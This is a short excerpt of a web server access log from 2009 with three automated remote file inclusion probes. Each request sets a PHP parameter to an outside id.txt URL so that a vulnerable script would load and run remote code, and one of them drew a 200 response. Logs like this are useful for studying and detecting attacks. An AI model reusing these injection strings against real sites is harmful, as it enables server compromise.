93.188.112.35 - - [27/Jun/2009:08:08:15 -0500] "GET /logs/?custompluginfile[]=http://www.fairtradecentrum.cz/language/tools/id.txt?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
62.140.23.192 - - [27/Jun/2009:08:11:44 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.140.23.192 - - [27/Jun/2009:08:11:44 -0500] "GET //include/bbs.lib.inc.php?site_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
